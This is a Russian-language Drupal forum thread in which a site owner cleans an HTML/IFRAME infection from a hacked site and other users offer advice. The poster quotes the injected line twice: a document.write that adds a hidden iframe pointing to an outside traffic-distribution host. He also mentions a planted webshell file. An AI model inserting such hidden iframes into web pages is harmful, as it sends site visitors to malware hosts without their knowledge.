[РЕШЕНО] Вирус на сайте HTML/IFRAME.B.GEN

Главные вкладки

Аватар пользователя kpv_dnepr@drupal.org kpv_dnepr@drupal.org 22 августа 2012 в 15:09

Hello world)

Словил вирус, видимо ломанули ftp

Входные данные.

1. О вирусе сообщил Яндекс.Вебмастер
2. Так же пользователи на сайте сообщают что ругается антивирусник
"HTML/IFRAME.B.GEN вирусняк найден NOD32 v 5"
3. Нашел инфу что этот вирус дописывает код в js и выводит на сайте iframe
4. Видно дописанные iframe только когда залогиниваешься

Что сделано.

1. Сменены все пароли)
2. На некоторых сайтах найден вредоносный код в js и сообщение о вирусе исчезло.
3. На одном сайте никак не могу найти вредоносный код. Перезалил ядро, перезалил модули которые выполняют js, но iframe как были, так и есть.

Вопрос. Что можно еще предпринять, где еще поискать? Может есть какие нибудь средства для поисков вирусов?

Комментарии

Аватар пользователя kpv_dnepr@drupal.org kpv_dnepr@drupal.org 22 августа 2012 в 16:01

Проверил page.tpl.php node.tpl.php template.php на вид ничего нет.

А у вас был код в этих файлах?

Яндекс.Вебмастер говорит что это Troj/ExpJS-EW - троян. Где он может сидеть? И может ли он самораспространяться?

Аватар пользователя kpv_dnepr@drupal.org kpv_dnepr@drupal.org 22 августа 2012 в 18:00

gorr wrote:
Проверяйте js файлы.

Все js просто взял и перезалил

Скажите, насколько точную информацию выдает он-лайн сканер http://vms.drweb.com/online/

Да, еще, что делать с файлами которые лежат в files/languages, удалить почему то не могу.

Аватар пользователя EvgenySorokin EvgenySorokin 22 августа 2012 в 18:21

Nod32 молчит. Вполне возможно, что вылечили все.
Если остался пример вредоносного кода, то скачайте по фтп сайт и сделайте notepad++ поиск по всем файлам.

Аватар пользователя kpv_dnepr@drupal.org kpv_dnepr@drupal.org 23 августа 2012 в 14:39

Из наблюдений, ставил кучу антивирусников, срабатывает только NOD32, вот что ловит

http://alternathistory.org.ua/misc/drupal.js?8 HTML/Iframe.B.Gen вирус

такой вот код

<?phpdocument.write('<iframe src="http://luvandcree.co.cc/TDS/go.php?sid=2" scrolling="no" width=10  height=10 style="display:none"></iframe>');?>

http://alternathistory.org.ua/includes/cnf.php PHP/WebShell.NAH троянская программа

В оригинальной установке такого нет, как я понимаю это все враждебный файл с кодом?

Аватар пользователя kpv_dnepr@drupal.org kpv_dnepr@drupal.org 23 августа 2012 в 20:14

Вторая серия

Строка
<?php document.write('<iframe src="http://luvandcree.co.cc/TDS/go.php?sid=2" scrolling="no" width=10  height=10 style="display:none"></iframe>');?>

перекочевала в файл http://alternathistory.org.ua/files/languages/ru_388b1f69425f86b75a782b8...

но с этим файлом я ничего сделать не могу, удалить, изменить, что это вообще за файлы, и кто их создает?

Аватар пользователя Orion76 Orion76 24 августа 2012 в 0:47

"<a href="mailto:kpv_dnepr@drupal.org">kpv_dnepr@drupal.org</a>" wrote:
но с этим файлом я ничего сделать не могу,

(drupal 7) меню Администрирование » Конфигурация » Разработка »
Производительность

чекбокс : Объединение файлов JavaScript.

очистка кэша на этой же странице должна помочь..